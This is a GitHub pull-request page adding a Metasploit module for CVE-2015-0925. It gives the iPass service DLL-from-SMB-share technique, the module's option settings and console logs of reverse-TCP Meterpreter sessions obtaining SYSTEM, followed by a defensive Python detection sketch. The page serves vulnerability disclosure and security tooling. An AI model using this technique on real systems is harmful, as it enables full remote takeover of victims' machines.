
Exploit module for CVE 2015-0925 (iPass Open Mobile Windows Client RCE) #4899

Merged: 1 commit into rapid7:master, Mar 12, 2015

Conversation

@h0ng10 (Contributor) commented Mar 9, 2015

This module exploits a vulnerability in the iPass Mobile Client 2.4.4 and earlier. Using an iPass service command on a named pipe it is possible to force the iPass service to load a DLL from an SMB share, allowing RCE as SYSTEM.

A vulnerable version can be found here:
http://ipass.drachenfels.de/download.aspx

If you have any questions, please let me know.

Example output

msf exploit(ipass_pipe_exec) > show options
Module options (exploit/windows/smb/ipass_pipe_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST      192.168.XXX.190  yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass    XXXX             no        The password for the specified username
   SMBUser    user             no        The username to authenticate as
   SMB_DELAY  15               yes       Time that the SMB Server will wait for the payload request
   SRVHOST    192.168.XXX.164  yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    445              yes       The local port to listen on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.XXX.164  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x64

msf exploit(ipass_pipe_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.XXX.164:4444
[*] Server started.
[*] File available on \\192.168.XXX.164\XwlTs\pirKiTa.dll...
msf exploit(ipass_pipe_exec) > [*] Sending stage (972288 bytes) to 192.168.XXX.190
[*] Meterpreter session 6 opened (192.168.XXX.164:4444 -> 192.168.XXX.190:54634) at 2015-03-09 11:51:50 -0400
[*] Server stopped.

msf exploit(ipass_pipe_exec) > sessions -i 6
[*] Starting interaction with 6...

meterpreter >


meterpreter > getuid
Server username: $U$NTAUTORITT\SYSTEM-0x4e542d4155544f524954c4545c53595354454d
meterpreter >
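
The behaviour described in this post (a service running as SYSTEM loading a DLL from an attacker-controlled SMB share) leaves an image-load trace that endpoint telemetry can catch. The Python below is a detection sketch added here as an example; it is not part of the module, the PR or Metasploit. The Sysmon-style Event ID 7 records, the service binary path, the hosts and the share and DLL names are constructed placeholders (the page does not name the iPass service executable).

```python
import re
from typing import Iterable, List, Tuple

# UNC image path: \\<host>\<share>\...\<name>.dll (case-insensitive)
UNC_DLL = re.compile(r"^\\\\(?P<host>[^\\]+)\\(?P<share>[^\\]+)\\.+\.dll$", re.I)
# Service accounts whose DLL loads run with system-level privilege
PRIVILEGED_USERS = {"NT AUTHORITY\\SYSTEM", "NT AUTHORITY\\LOCAL SERVICE",
                    "NT AUTHORITY\\NETWORK SERVICE"}

def suspicious_unc_loads(events: Iterable[dict],
                         trusted_hosts: frozenset = frozenset()) -> List[Tuple[str, str, str]]:
    """Return (process, dll_path, unc_host) for each Sysmon Event ID 7 record in which
    a privileged process loaded a DLL from a UNC host not in trusted_hosts (lower-case)."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 7:  # 7 = Image loaded; other event types are irrelevant here
            continue
        m = UNC_DLL.match(ev.get("ImageLoaded", ""))
        if m is None:  # local path: the DLL was not fetched over SMB
            continue
        if ev.get("User", "").upper() not in PRIVILEGED_USERS:
            continue
        if m.group("host").lower() in trusted_hosts:
            continue
        hits.append((ev.get("Image", "?"), ev["ImageLoaded"], m.group("host")))
    return hits

# Constructed sample records (Sysmon ImageLoad field names). The service binary
# path, hosts, share and DLL names are placeholders, not values from the PR.
SVC = r"C:\Program Files\iPass\PLACEHOLDER_service.exe"
SAMPLE_EVENTS = [
    {"EventID": 7, "Image": SVC, "User": "NT AUTHORITY\\SYSTEM",
     "ImageLoaded": r"\\10.0.0.5\share\payload.dll"},            # hit: SYSTEM, untrusted UNC host
    {"EventID": 7, "Image": SVC, "User": "NT AUTHORITY\\SYSTEM",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},         # local DLL, ignored
    {"EventID": 7, "Image": SVC, "User": "NT AUTHORITY\\SYSTEM",
     "ImageLoaded": r"\\fileserver01\apps\helper.dll"},           # trusted file server, ignored
    {"EventID": 7, "Image": r"C:\Users\alice\app.exe", "User": "CORP\\alice",
     "ImageLoaded": r"\\10.0.0.5\share\payload.dll"},            # unprivileged user, ignored
    {"EventID": 1, "Image": SVC, "User": "NT AUTHORITY\\SYSTEM",
     "ImageLoaded": r"\\10.0.0.5\share\payload.dll"},            # not an image-load event, ignored
    {"EventID": 7, "Image": r"C:\Windows\svc.exe", "User": "NT AUTHORITY\\LOCAL SERVICE",
     "ImageLoaded": r"\\192.0.2.9\X\Y.DLL"},                     # hit: mixed-case extension
]

def run_sample() -> List[Tuple[str, str, str]]:
    """Evaluate the constructed records with fileserver01 as the only trusted UNC host."""
    return suspicious_unc_loads(SAMPLE_EVENTS, frozenset({"fileserver01"}))
```

The two runs shown on this page use different random share and DLL names (XwlTs\pirKiTa.dll and tGong\cOnqwHf.dll), so the check keys on the UNC structure and the loading account rather than on any fixed name.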

@h0ng10 changed the title from "Exploit module for CVE 2015-0925 (Ipass iPass Open Mobile Windows Client RCE)" to "Exploit module for CVE 2015-0925 (iPass Open Mobile Windows Client RCE)" Mar 11, 2015
@jvazquez-r7 jvazquez-r7 self-assigned this Mar 12, 2015
@jvazquez-r7 jvazquez-r7 merged commit bba4223 into rapid7:master Mar 12, 2015
@jvazquez-r7 (Contributor) commented:

Thanks @h0ng10 ! Minor cleanup and landed, final result here: e035e6c

Test:

msf exploit(ipass_pipe_exec) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(ipass_pipe_exec) > [*] Server started.
[*] File available on \\172.16.158.1\tGong\cOnqwHf.dll...
[*] Sending stage (770048 bytes) to 172.16.158.134
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.134:63317) at 2015-03-12 16:33:49 -0500

msf exploit(ipass_pipe_exec) >
msf exploit(ipass_pipe_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : EXPLOITER
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
